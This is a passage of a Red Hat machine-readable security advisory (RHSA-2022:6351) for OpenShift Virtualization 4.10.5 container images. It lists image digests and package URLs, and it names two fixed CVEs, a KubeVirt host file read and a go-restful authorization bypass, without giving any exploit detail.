{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.10.5 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.10.5 images:\n\nRHEL-8-CNV-4.10\n===============\ncluster-network-addons-operator-container-v4.10.5-1\nkubemacpool-container-v4.10.5-1\nvirt-cdi-importer-container-v4.10.5-1\nhyperconverged-cluster-operator-container-v4.10.5-1\nhostpath-provisioner-operator-container-v4.10.5-1\nvirtio-win-container-v4.10.5-1\nvirt-cdi-cloner-container-v4.10.5-1\nkubevirt-ssp-operator-container-v4.10.5-1\ncnv-containernetworking-plugins-container-v4.10.5-1\nhyperconverged-cluster-webhook-container-v4.10.5-1\nvirt-cdi-apiserver-container-v4.10.5-1\novs-cni-plugin-container-v4.10.5-1\nvirt-cdi-uploadserver-container-v4.10.5-1\nvirt-cdi-uploadproxy-container-v4.10.5-1\nvirt-cdi-controller-container-v4.10.5-1\nkubevirt-template-validator-container-v4.10.5-1\nvirt-cdi-operator-container-v4.10.5-1\nhostpath-provisioner-container-v4.10.5-1\nhostpath-csi-driver-container-v4.10.5-1\nkubernetes-nmstate-handler-container-v4.10.5-1\novs-cni-marker-container-v4.10.5-1\nbridge-marker-container-v4.10.5-1\nnode-maintenance-operator-container-v4.10.5-1\ncnv-must-gather-container-v4.10.5-2\nvirt-controller-container-v4.10.5-3\nvirt-api-container-v4.10.5-3\nvirt-handler-container-v4.10.5-3\nvirt-operator-container-v4.10.5-3\nvirt-artifacts-server-container-v4.10.5-3\nvirt-launcher-container-v4.10.5-3\nlibguestfs-tools-container-v4.10.5-3\nhco-bundle-registry-container-v4.10.5-6\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* go-restful: Authorization Bypass Through User-Controlled Key (CVE-2022-1996)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6351", url: "https://access.redhat.com/errata/RHSA-2022:6351", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2070366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070366", }, { category: "external", summary: "2094982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094982", }, { category: "external", summary: "2099324", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099324", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "2118367", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118367", }, { category: "external", summary: "2120061", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2120061", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6351.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.10.5 Images security and bug fix update", tracking: { current_release_date: "2024-11-25T08:02:28+00:00", generator: { date: "2024-11-25T08:02:28+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.1", }, }, id: "RHSA-2022:6351", initial_release_date: "2022-09-06T14:00:38+00:00", revision_history: [ { date: "2022-09-06T14:00:38+00:00", number: "1", summary: "Initial version", }, { date: "2022-09-06T14:00:38+00:00", number: "2", summary: "Last updated version", }, { date: "2024-11-25T08:02:28+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.10 for RHEL 8", product: { name: "CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.10::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.10.5-2", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.10.5-6", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_id: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_id: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", product: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", product_id: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", product_identification_helper: { purl: "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", product: { name: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", product_id: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", product_identification_helper: { purl: "pkg:oci/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", product: { name: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", product_id: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", product_id: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", product_id: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", product_id: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", product_id: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.10.5-3", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", 